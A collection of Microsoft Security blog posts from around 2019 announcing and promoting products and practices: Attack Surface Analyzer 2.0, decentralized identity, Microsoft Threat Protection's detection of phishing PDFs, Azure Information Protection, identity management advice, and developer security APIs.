Attack Surface Analyzer 2.0 can help you identify potential security risks introduced by changes to an operating system’s security configuration by identifying changes in key areas, including:

  • File System
  • User Accounts
  • System Services
  • Network Ports (listeners)
  • System Certificate Stores
  • Windows Registry

This tool can play an important role in ensuring that the software you develop or deploy doesn’t adversely affect the operating system security configuration by allowing you to scan for specific types of changes.

Results from the comparison analysis feature highlight relevant changes, which can be easily viewed or exported.

The tool includes both Electron and command line interface options. Results for the command line use option are written to a local HTML or JSON file, making it easy to include as part of your automated toolchain.

Detecting these types of changes can be error prone and time consuming. Attack Surface Analyzer 2.0 helps make it easy.

We look forward to your comments, ideas, and contributions for improving this tool. To learn more about Attack Surface Analyzer 2.0, please visit our GitHub project page at

The post Announcing the all new Attack Surface Analyzer 2.0 appeared first on Microsoft Security.

Decentralized identity and the path to digital privacy

Security is the central challenge of the digital age. Our digital lives have moved into the cloud. People now use multiple devices to connect to multiple applications through many different networks. Just about everything is connected to the internet, where threats remain constant and evolving. In this distributed, heterogeneous environment, however, there’s still only one “you.” That’s why identity is the best path to security.

The identity technologies my team at Microsoft builds serve as the frontline of our enterprise-class security solutions. Whether it’s a customer using biometrics to log in with Windows Hello, or enterprises relying on us to deliver risk-based conditional access through Azure Active Directory, identity is the front door to our customers’ content and experiences.

Identity can also be a key enabler to something that’s as important to our customers as security—privacy. With identity as the control plane, we’ve made security solutions more sophisticated, which is a good thing for both organizations and individuals. But when it comes to privacy, the needs of individuals and organizations are still out of balance. This week, I’m in Munich, Germany, at the European Identity and Cloud Conference to talk about how mechanisms like decentralized identity can help us address this imbalance.

Joy Chik speaking at the European Identity and Cloud Conference in Munich, Germany

Anyone who reads the news knows that many individuals feel organizations have way too much control over their personal information. Organizations are rightfully being asked to take more responsibility for protecting the information of their customers. Even the best security isn’t enough, however, if we don’t give people greater control and privacy as well.

That control begins with identity, because in your digital life, everything starts with you. Your identity is who you are. It’s everything you say, do, and experience in your everyday life. Identity can provide the same control plane for privacy that it has for security.

At Microsoft, we envision a world where technology facilitates respect for privacy. In this world, organizations no longer need to issue new identities. Instead, they embrace the digital identities that individuals bring with them. Each person’s digital identity belongs to them. They control it.

In this world, organizations are more intentional about the type of data they collect, how much they collect, where it comes from, and where it is stored. They accept information from individuals that an independent authority has verified, like citizenship verified by a government agency or education level verified by a university. Using verifiable credentials or claims that are digital, individuals can prove who they are, and they can exchange digital information, or what they are, with each organization. In other words, individuals and organizations can establish a mutual trust relationship.

Verifiable information is stored with the individual. The organization doesn’t have to collect or protect this sensitive information—less liability for them, and more control for the individual. When people control their own identity, they can set constraints and control their digital data, sharing only the information necessary to conduct business with organizations, and no more.

Organizations, for their part, can decide to store information with individuals rather than storing it themselves. This allows them to collaborate with anyone, confident that the information exchanged can be trusted, while reducing their liability and improving compliance. The individual, in essence, becomes a data controller. This changes the relationship—and the balance of power—with organizations.

We’re already seeing industry support for this paradigm shift, spearheaded by the work the Decentralized Identity Foundation (DIF) is doing. Microsoft, along with other companies, is contributing open source code to DIF so developers can take advantage of decentralized identities. Soon, DIF will have everything necessary for individuals and organizations to start using them. We’re working with the community to build support for decentralized identity into the Microsoft platform so we can enable innovation, and so we can bring individuals and organizations together for stronger security and privacy.

As part of our goal to empower everyone with a self-owned identity, we’re contributing technologies to a system that can support all kinds of entities, including millions of organizations, billions of people, and trillions of devices. One example of this is our collaboration with members of DIF, notably ConsenSys and Transmute, to develop a blockchain-agnostic protocol for creating scalable DID networks, called Sidetree.

As part of that collaboration, earlier this week we announced an early preview of a Sidetree-based DID network that runs atop the Bitcoin blockchain, called ION (Identity Overlay Network). ION is designed to deliver the scale required for a world of DIDs, while inheriting and preserving the attributes of decentralization present in the Bitcoin blockchain. As with previously announced efforts, we’re sharing our work as early as possible, rough edges and all, to start a conversation with the community and encourage further collaboration.

These examples are only the beginning of our efforts to champion digital privacy through identity. The privacy conversation requires constant engagement and collaboration. In addition to industry partners, we’re calling on organizations everywhere to join us in this effort:

  • Instead of issuing new digital identities for external parties like partners and customers, accept existing ones that users bring.
  • Limit the data you’re collecting to only what’s necessary and accept independently verified information from individuals.
  • Based on your business model, decide where you will balance control over data between your organization and the individuals who do business with you.

Privacy is a human right. To protect that right, individuals must be empowered to control their own digital identities. Many members of the identity community, including Microsoft, are committed to making this real.

The post Decentralized identity and the path to digital privacy appeared first on Microsoft Security.

Executing on the vision of Microsoft Threat Protection

Over the last several months, we’ve provided regular updates on the rapid progress we’re making with Microsoft Threat Protection, which enables your organization to:

  • Protect your assets with identity-driven security and powerful conditional access policies which ensure your assets are secured from unauthorized users, devices, or apps.
  • Connect the dots between disparate threat signals and develop threat incidents by grouping alerts from different parts of your environment, stitching together the elements of a threat.
  • Empower your defenders, providing in-depth analysis to identify the full scope and impact of a threat.

We support these capabilities by offering you intelligent automation as well as human expertise to quickly resolve situations and keep your business running. I recently shared our vision of Microsoft Threat Protection with Jeremy Chapman in a Microsoft Mechanics video broadcast:

We strongly believe in our vision and are confident our customers will benefit from enhanced security with Microsoft Threat Protection as we continue adding capabilities with unstoppable momentum. Today, I want to spend time highlighting what Microsoft Threat Protection can already do for you. While we’re very excited about the vision and pushing towards releasing more features, it’s important to share the significant advantages which are already available with Microsoft Threat Protection today. I’m going to use a real example of a common, yet lethal, threat type to showcase how Microsoft Threat Protection already makes your organization more secure.

Executing on our vision

The more threats we see, the more we can stop. This virtual cycle means that each threat we see helps further enhance our machine learning models, which in turn improves our ability to stop subsequent threats. As we’ve shared in the past, the Microsoft Intelligent Security Graph (Figure 1) enables us to see billions of threats and assess 6.5 trillion signals daily. Importantly, we don’t only see a large quantity of threats, but we also see threats from a wide variety of sources. Through the Intelligent Security Graph, threat signals are seamlessly shared across all the services in Microsoft Threat Protection, providing comprehensive security across multiple attack vectors.

Infographic of the strength of signal offered by the Microsoft Intelligent Security Graph.

Figure 1. The strength of signal offered by the Microsoft Intelligent Security Graph.

A great example of how Microsoft Threat Protection is already executing on its promised vision is how we address phishing campaigns. Phishing has been on a steady rise over the last few years. As the provider of one of the largest email services on the planet, we expect to be a primary target for attacks. In 2018 alone, Microsoft’s analysts analyzed (Figure 2) over 300,000 phishing campaigns and 8 million business email compromise (BEC) attempts.

Infographic showing data from Office 365 security analysts on the phishing campaigns and BEC attempts from 2018.

Figure 2. Data from Office 365 security analysts on the phishing campaigns and BEC attempts from 2018.

While these numbers can be worrisome, Microsoft Threat Protection is designed to secure your organization from phishing, whether the campaign attacks the endpoint, email, or through the web. In a recent campaign, anomaly detection algorithms in Microsoft Defender Advanced Threat Protection (ATP) next-generation protection pointed to multiple PDF files that  Microsoft could detect. We were the only organization able to detect these phish PDFs because we leveraged the knowledge from multiple security services operating on various attack vectors. In this example, the malicious PDF files (Figure 3) were blocked by machine learning models, enhanced by assimilating signals from multiple services of Microsoft Threat Protection.

Image of one of several PDF files that only Microsoft was detecting (as Trojan:PDF/Sonbokli.A!cl) at the time it was first observed (Source: VirusTotal).

Figure 3. One of several PDF files that only Microsoft was detecting (as Trojan:PDF/Sonbokli.A!cl) at the time it was first observed (Source: VirusTotal).

Through the Microsoft Intelligent Security Graph, the detection algorithm was enriched with URL and domain reputation intelligence from Microsoft Defender SmartScreen, the service powering the anti-phishing technology in Microsoft Edge, as well as the network protection capability in Microsoft Defender ATP.

Additionally, Office 365 Advanced Threat Protection (ATP) provided rich optics from PDF phish files distributed via email. When Office 365 ATP detects a suspicious file or URL in emails, it can detonate the file and apply heuristics and sophisticated machine learning to determine a verdict. This verdict is shared with other services in Microsoft Threat Protection. In the case of these PDF files, all the services in Microsoft Threat Protection could immediately block the corrupted PDF files because the original signal from Office 365 ATP was shared with all the other services in Microsoft Threat Protection.

Microsoft Threat Protection also stops threats quickly because of its unique attributes. Every day, Microsoft sees millions of new attacks that run for just 60 minutes or less. This fast pace requires security to be automatic, in real-time, and accurate. The signal sharing and mitigation across Microsoft Threat Protection is robust and comprehensive. Below (Figure 4) is an actual timeline showing how the threat originally identified by SmartScreen provided signal to both Office ATP and Microsoft Defender ATP, which both blocked the threat.

Image of a threat timeline of a campaign from the first identification with SmartScreen to mitigations by Office ATP/Exchange Online Protection (EOP) and Microsoft Defender ATP.

Figure 4. Threat timeline of this campaign from the first identification with SmartScreen to mitigations by Office ATP/Exchange Online Protection (EOP) and Microsoft Defender ATP.

Great intelligence enables great security

Our unparalleled intelligence, seamless integration, and best-of-breed solutions for multiple attack vectors leads to the staggering numbers of threats we can detect and mitigate across multiple threat vectors. Below are statistics of the threats which Microsoft Threat Protection mitigated in 2018 (Figure 5). What’s important is not only the number of threats we’ve detected and blocked, but also the fact that we do so for threats across multiple, disparate attack vectors. This is the same strength of security you will benefit from when you implement Microsoft Threat Protection.

Image of Microsoft Threat Protection in action. Some of the detections and mitigations already offered with the solution.

Figure 5. Microsoft Threat Protection in action. Some of the detections and mitigations already offered with the solution.

Revamped website to keep you up to date

Today, we’re excited to launch our new Microsoft Threat Protection website, where you’ll find great collateral summarizing the full scope of capabilities offered by Microsoft Threat Protection. On the site, you’ll find three new webcasts where our engineers offer details and examples of:

  • Automated Incident Response—Unique SecOps capabilities only available with Microsoft.
  • Azure Sentinel—Our newly launched SIEM-as-a-service.
  • Microsoft Threat Experts and Threat and Vulnerability Management—For endpoints.

The new site also links to all the services which are part of Microsoft Threat Protection with great collateral offering details on how the individual services help secure specific attack vectors.

Experience the evolution of Microsoft Threat Protection

Hopefully, I gave you a glimpse of how Microsoft Threat Protection has already started executing on the vision of securing the modern organization. Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit our new website.

Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Begin a trial of Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution available to your organization.

The post Executing on the vision of Microsoft Threat Protection appeared first on Microsoft Security.

Safeguard your most sensitive data with Microsoft 365

I am Security Operations’ (SecOps) worst nightmare. Or at least I used to be.

As an industrious product marketer, I often share intellectual property (think: details of new product capabilities) or spreadsheets that contain customer personal identifying information (PII) with colleagues and vendors. We need this information to create compelling marketing programs to sell our products, but if the data gets in the wrong hands, it could be devastating to the company. Like most of us in tech, my deadlines are tight and I work hard to get things done quickly.

At beginning of my career, this included finding ways around obstacles that slowed me down, even those designed to secure sensitive information. It wasn’t that I wanted to put my company at risk, but I couldn’t do my job without sharing information with the agencies and consultants I worked with.

Most organizations employ people like (the younger) me. They have the best of intentions but may inadvertently cause a data privacy violation. Leaked data can cause reputational damage and result in big fines levied against firms that don’t violate privacy regulations, like General Data Protection Regulation (GDPR). The Safeguard your most sensitive data e-book sheds light on how Microsoft 365 helps employees make the right decisions about data and comply with data privacy regulations. It provides a window into the various scenarios when employees come into contact with and share sensitive data. The e-book narrates the story of Enzo, a (fictitious) sales manager, who shares and works with private data. His organization uses Microsoft 365 products to label and protect information, wherever it travels.

Label and protect data easily

Azure Information Protection can be configured to detect sensitive data in files and automatically classify and apply protections, or it can suggest labels to the file owner. You decide how much responsibility you want to give to your users and which circumstances require automatic labeling. The Safeguard your most sensitive data e-book provides examples of the different data types that can be detected and the templates that can simplify the process for both you and the user.

Protect data even when it travels

Once a file is labeled, Microsoft Cloud App Security works with Azure Information Protection to enforce protections even as it travels through third-party cloud apps and partner organizations. Azure Information Protection lets document owners define user permissions, such as limiting a specific user or domain to view access only. You can even monitor files and revoke access after they leave the enterprise ecosystem. The Safeguard your most sensitive data e-book details several real-life scenarios, so you can visualize how different capabilities can be applied to your unique situation.

Apply security policies to historical, on-premises data

For companies in the beginning or middle phases of a cloud migration, one daunting roadblock is privileged data stored in on-premises repositories. It can be difficult to determine what sensitive data has accumulated over the years and where it is stored. The Azure Information Protection scanner can be configured to scan on-premises file servers to detect PII and other sensitive data. Once the data is detected, the scanner can automatically apply labels and protection.

Learn more

In my first marketing role at a cybersecurity company years ago, I was lucky to work with an engaged chief information security officer (CISO) who took the time to help me understand the implications of sharing sensitive data. Microsoft 365 makes it even easier to do the right thing. Azure Information Protection, Microsoft Cloud App Security, and other Microsoft 365 products remind me when I’m handling sensitive data, so I can make sure that only the people who truly need it can view it.

For more details on how you can use Microsoft 365 Enterprise E5 to keep customer and enterprise data safe, download the Safeguard your most sensitive data e-book.

Read all six e-books

The post Safeguard your most sensitive data with Microsoft 365 appeared first on Microsoft Security.

3 investments Microsoft is making to improve identity management

As a large enterprise with global reach, Microsoft has the same security risks as its customers. We have a distributed, mobile workforce who access corporate resources from external networks. Many individuals struggle to remember complex passwords or reuse one password across many accounts, which makes them vulnerable to attackers. As Microsoft has embraced digital transformation for our own business, we shifted to a security strategy that places strong employee identities at the center. Many of our customers are on a similar journey and may find value in our current identity management approach.

Our goal is to reduce the risk of compromised identity and empower people to be efficient and agile whether they’re on our network or not.

Our identity management solutions focus on three key areas:

Read on for more details for each of these investment areas, advice on scaling your investment to meet your budget, and a wrap-up of some key insights that can help you smoothly implement new policies.

Securing administrator accounts

Our administrators have access to Microsoft’s most sensitive data and systems, which makes them a target of attackers. To improve protection of our organization, it’s important to limit the number of people who have privileged access and implement elevated controls for when, how, and where administrator accounts can be used. This helps reduce the odds that a malicious actor will gain access.

There are three practices that we advise:

  • Secure devices—Establish a separate device for administrative tasks that is updated and patched with the most recent software and operating system. Set the security controls at high levels and prevent administrative tasks from being executed remotely.
  • Isolated identity—Issue an administrator identity from a separate namespace or forest that cannot access the internet and is different from the user’s information worker identity. Our administrators are required to use a smartcard to access this account.
  • Non-persistent access—Provide zero rights by default to administration accounts. Require that they request just-in-time (JIT) privileges that gives them access for a finite amount of time and logs it in a system.

Budget allocations may limit the amount that you can invest in these three areas; however, we still recommend that you do all three at the level that makes sense for your organization. Calibrate the level of security controls on the secure device to meet your risk profile.

Eliminating passwords

The security community has recognized for several years that passwords are not safe. Users struggle to create and remember dozens of complex passwords, and attackers excel at acquiring passwords through methods like password spray attacks and phishing. When Microsoft first explored the use of Multi-Factor Authentication (MFA) for our workforce, we issued smartcards to each employee. This was a very secure authentication method; however, it was cumbersome for employees. They found workarounds, such as forwarding work email to a personal account, that made us less safe.

Eventually we realized that eliminating passwords was a much better solution. This drove home an important lesson: as you institute policies to improve security, always remember that a great user experience is critical for adoption.

Here are steps you can take to prepare for a password-less world:

  • Enforce MFA—Conform to the fast identity online (FIDO) 2.0 standard, so you can require a PIN and a biometric for authentication rather than a password. Windows Hello is one good example, but choose the MFA method that works for your organization.
  • Reduce legacy authentication workflows—Place apps that require passwords into a separate user access portal and migrate users to modern authentication flows most of the time. At Microsoft only 10 percent of our users enter a password on a given day.
  • Remove passwords—Create consistency across Active Directory and Azure Active Directory (Azure AD) to enable administrators to remove passwords from identity directory.

Simplifying identity provisioning

We believe the most underrated identity management step you can take is to simplify identity provisioning. Set up your identities with access to exactly the right systems and tools. If you provide too much access, you put the organization at risk if the identity becomes compromised. However, under-provisioning may encourage people to request access for more than they need in order to avoid requesting permission again.

We take these two approaches:

  • Set up role-based access—Identify the systems, tools, and resources that each role needs to do their job. Establish access rules that make it easy to give a new user the right permissions when you set up their account or they change roles.
  • Establish an identity governance process—Make sure that as people move roles they don’t carry forward access they no longer need.

Establishing the right access for each role is so important that if you are only able to follow one of our recommendations focus on identity provisioning and lifecycle management.

What we learned

As you take steps to improve your identity management, keep in mind the following lessons Microsoft has learned along the way:

  • Enterprise-level cultural shifts—Getting the technology and hardware resources for a more secure enterprise can be difficult. Getting people to modify their behavior is even harder. To successfully roll out a new initiative, plan for enterprise-level cultural shifts.
  • Beyond the device—Strong identity management works hand-in-hand with healthy devices.
  • Security starts at provisioning—Don’t put governance off until later. Identity governance is crucial to ensure that companies of all sizes can audit the access privileges of all accounts. Invest early in capabilities that give the right people access to the right things at the right time.
  • User experience—We found that if you combine user experience factors with security best practices, you get the best outcome.

Learn more

For more details on how identity management fits within the overall Microsoft security framework and our roadmap forward, watch the Speaking of security: Identity management webinar.

The post 3 investments Microsoft is making to improve identity management appeared first on Microsoft Security.

Identity enhancements to support the more than 1 million active third-party applications on our platform

This week at //build 2019, we’re announcing several enhancements to our identity platform for developers. These enhancements are designed to support the more than one million active third-party applications using our identity platform each month and include:

  • Our work to unify the Microsoft identity platform across personal accounts and Azure Active Directory (Azure AD) accounts.
  • Our new unified app registrations portal.
  • The Microsoft Authentication Libraries.
  • Ability to use your GitHub identity to sign in to Microsoft products.

Head over the Identity blog for a closer look at these enhancements for developers. If you’re at //build this week stop by the Microsoft identity platform and Azure AD booths.

The post Identity enhancements to support the more than 1 million active third-party applications on our platform appeared first on Microsoft Security.

Developing connected security solutions

Many organizations deploy dozens of security products and services from Microsoft and others to combat increasing cyberthreats. As a result, the ability to quickly extract value from these solutions has become more challenging. This creates opportunity for developers to build solutions that augment and integrate security across products, services, tools, and workflows. With Gartner forecasting worldwide information security spending to exceed $124 billion by the end of 2019, the potential for developers in cybersecurity is significant and growing.

Developers at independent software vendors (ISVs), managed security providers (MSP/MSSPs), IT services and systems integrators (SIs), and enterprises can:

  • Solve integration and deployment challenges.
  • Extend capabilities to meet customer- or industry-specific needs.
  • Address security skills and staffing shortages through automation.

Using traditional paradigms, developers can build integrated apps with Microsoft APIs and SDKs. In addition, new options have emerged for security experts to develop security experiences, workflows, and analytics without writing any code. By supporting a diverse set of capabilities for security developers of all types, Microsoft enables them to:

  • Unlock value for Microsoft customers—Create solutions for the more than 19 million Microsoft Cloud customers, which includes 95 percent of Fortune 500 businesses, governments and startups.
  • Accelerate application development—Unified Microsoft Graph APIs simplify development across services and data connectors (like Azure Logic Apps, Microsoft Flow, etc.) provide code-free options. Samples and guidance make it easy to get started, and communities enable collaboration and learning.
  • Leverage the speed and scale of the Microsoft Cloud—Microsoft’s cloud platform and services enable developers to collect and analyze large amounts of varied security data and build apps at global scale.

How to develop connected security solutions

Microsoft offers a combination of APIs and services that can be used by developers. Both are supported by communities, where developers can collaborate with their peers.


By sharing security insights and taking actions in real-time, integrated apps can streamline security management, improve threat protection, and speed response. Developers can leverage Microsoft APIs and SDKs to realize end-to-end scenarios for their apps using:

  • Microsoft Graph Security API to streamline integration across multiple security solutions to enable cross-product scenarios. Microsoft Graph Security API provides a single programmatic interface with a common schema and authentication model to simplify integration for these scenarios.

and / or

  • Direct APIs and SDKs to connect to individual services to enable product-specific scenarios.


Microsoft provides a rich set of services to power integrated security event management, analytics, investigation, and automation. Developers can build experiences, workflows, and analytics on top of the following services to deliver additional value to customers:

  • Azure Sentinel is a cloud native Security Information and Event Management (SIEM) service. With Azure Sentinel you can connect various data sources for security monitoring and analysis, author detection queries to mitigate threats, and build workflows to enable security automations, dashboards for reporting, and machine learning models for threat detection.
  • Azure Logic Apps and Microsoft Flow—For workflow automations and orchestrations.
  • Azure Notebooks and Power BI—For analytics and reporting.


Open-source communities on GitHub enable developers to easily share code samples, detection rules, machine learning models, playbooks, tools, and more. These communities enable collaboration with other security experts to learn and share. A security developer GitHub community serves as a starting point to share code, libraries, notebooks, workbooks, and queries for connected experiences, as well as a resource to find related communities.

Get started today

Here are a few resources to help you get started:

  • A new Developer’s Guide to Building Connected Security Solutions offers a primer for those who want to build apps, workflows, and analytics that integrate with Microsoft security solutions. In addition to introducing the Microsoft APIs, services, and communities available to developers, the guide offers detailed guidance on when and how to use each one and what technology and integration option best aligns with your desired scenario and application type. Download the guide.
  • Visit the GitHub community to learn from and share with other security developers.
  • Attend the Microsoft Build session, “Building apps that integrate, automate, and manage security operations,” Wednesday, May 8, at 5 PM.

The post Developing connected security solutions appeared first on Microsoft Security.

Get security beyond Microsoft products with Microsoft 365

Over time, organizations and individuals acquire stuff. Things we love and things we need. Things we don’t need but can’t seem to get rid of. I was confronted with this challenge when we bought a 1908 craftsman home. How could I make my beloved modern furniture and mandatory kid-friendly gear work? Planning a space that pulled together the contemporary pieces with the old-world details of our home took some work, but it was worth it (and actually kind of fun). Best of all, our home has character and it feels like us.

IT organizations have also accumulated stuff over the years. Legacy systems can’t be easily replaced (like my kid-friendly furniture). Investments have been made in cloud services and security solutions to solve specific problems. It’s not always practical or even smart to replace existing products around which IT has developed processes that work. This can be a struggle for security architects striving for a single pane of glass across their security ecosystem. While they might never reach that holy grail, Microsoft 365 can get them a lot closer.

Microsoft security capabilities can extend across the entire digital landscape, including non-Microsoft products and services. Our latest e-book, Security beyond Microsoft products, illustrates how IT can secure a diverse digital estate and integrate with other security solutions to eliminate “security silos.”

Secure a diverse digital estate

The Security beyond Microsoft products e-book provides concrete examples of how Microsoft 365 security can be used to protect non-Microsoft applications and services. For example, you can use Azure Active Directory (Azure AD) to extend your sign-in policies to thousands of third-party cloud apps. Microsoft Intune secures and manages Android and Apple devices. You can even track threats across a hybrid cloud ecosystem.

Integrate with other security solutions

Microsoft 365 is a complete, intelligent solution, but it also integrates well with other security products. If you have individual security products that are still under contract or that you’ve fine-tuned for your team and processes, there is no need to lose those investments. The Security beyond Microsoft products e-book describes how Microsoft 365 works with other vendor products, such as a third-party Multi-Factor Authentication (MFA) product or a data loss prevention (DLP) solution.

Learn more

I was able to bring eclectic pieces together in a seamless, comfortable way that balanced the old and new, and you can do the same across your security organization. Learn more by downloading the first five e-books in our series:

Check back to read the final e-book in this series, “Secure your most sensitive data,” which details how Microsoft 365 can protect your data even as it travels.

The post Get security beyond Microsoft products with Microsoft 365 appeared first on Microsoft Security.

Updates for Microsoft 365 help strengthen data privacy

As data continues to grow exponentially and travel across organizational boundaries, privacy and compliance professionals play an increasingly strategic role within organizations. Several updates—announced today—for Microsoft 365 provide organizations with more control and options to strengthen their data privacy practices, including:

  • New capabilities for Microsoft 365 E5 and E5 Compliance, such as the new Office 365 Advanced Message Encryption feature, data investigation capabilities, Microsoft Teams compliance features, and a new Advanced eDiscovery experience.
  • The ability to use Compliance Manager to get automated updates of security controls and create your own assessments—including on-premises and non-Microsoft applications—against any regulation or standard, so you can manage compliance across data assets in a unified way.

To learn more about these updates, read Grow and protect your business with more privacy controls from Microsoft 365.

The post Updates for Microsoft 365 help strengthen data privacy appeared first on Microsoft Security.